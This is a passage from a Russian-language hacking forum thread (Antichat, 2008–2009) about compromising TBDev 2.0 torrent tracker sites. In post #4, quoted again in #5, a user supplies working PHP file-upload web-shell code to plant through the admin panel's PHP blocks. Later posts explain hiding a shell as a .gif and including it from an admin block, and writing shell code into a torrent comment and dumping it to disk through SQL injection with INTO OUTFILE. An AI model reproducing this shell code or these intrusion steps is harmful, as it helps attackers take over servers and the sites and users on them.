HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Трекер-движок TBDev 2.0
   
Ответ
Страница 6 из 27 « Первая < 2 3 4 5 6 7 8 9 10 16 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.12.2008, 16:11
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию
Как можно загрузить шелл имея админа? Реально такое?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 21.12.2008, 22:09
s_p_a_m
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами: 9607837

Репутация: 158
По умолчанию
через админку, создеш блок и вписываеш туда код шелла
 
Ответить с цитированием

  #3  
Старый 22.12.2008, 00:16
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию
Нет, при добавлении блока он ещё своё добавляет
 
Ответить с цитированием

  #4  
Старый 23.12.2008, 14:50
Uname-A
Познающий
Регистрация: 19.08.2008
Сообщений: 69
С нами: 9329667

Репутация: 31
По умолчанию
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
 
Ответить с цитированием

?
  #5  
Старый 13.01.2009, 17:03
pacan4ik
Новичок
Регистрация: 02.11.2008
Сообщений: 5
С нами: 9222108

Репутация: 0
По умолчанию ?
Цитата:
Сообщение от Uname-A  
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
 
Ответить с цитированием

  #6  
Старый 13.01.2009, 17:36
Red Virus
Новичок
Регистрация: 11.08.2008
Сообщений: 8
С нами: 9340988

Репутация: 7
По умолчанию
Цитата:
Сообщение от pacan4ik  
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
Лучше залей гифный шелл и с инклудь его с админки

Смени расширение шелла с php на gif залей на серв

в админке создай php блок и сунь туда этот код

например так

include("torrents/images/44776.gif");

потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл
Последний раз редактировалось Red Virus; 13.01.2009 в 17:41..
 
Ответить с цитированием

  #7  
Старый 14.01.2009, 16:21
Uname-A
Познающий
Регистрация: 19.08.2008
Сообщений: 69
С нами: 9329667

Репутация: 31
По умолчанию
Цитата:
Сообщение от pacan4ik  
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
Это для старой версии сделано...
На новой я не тестил..
У нас в локале повальное распространение старого двига Серверов 100 наверно
и все на одном двиге=)
 
Ответить с цитированием

  #8  
Старый 16.01.2009, 16:50
pacan4ik
Новичок
Регистрация: 02.11.2008
Сообщений: 5
С нами: 9222108

Репутация: 0
По умолчанию
Ну так кто поможет? может кто зделать блок через который залить шел
 
Ответить с цитированием

  #9  
Старый 16.01.2009, 22:46
pacan4ik
Новичок
Регистрация: 02.11.2008
Сообщений: 5
С нами: 9222108

Репутация: 0
По умолчанию
Икстати ред вирус можно зделать как нибудь не фаловый блок ,а простым блоком с инклудить?
 
Ответить с цитированием

  #10  
Старый 10.02.2009, 13:26
s_p_a_m
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами: 9607837

Репутация: 158
По умолчанию
Цитата:
Сообщение от pacan4ik  
Ну так кто поможет? может кто зделать блок через который залить шел
нафиг этот геморой? есть другой способ, пишеш комент к торренту в виде кода шелла, потом через скулю в мыле интоаутфайл свой комент и шелл готов
 
Ответить с цитированием
Ответ
Страница 6 из 27 « Первая < 2 3 4 5 6 7 8 9 10 16 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06
Проложение витых пар в городских домах Рогатый Трупоед "Железо" 11 20.09.2004 09:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.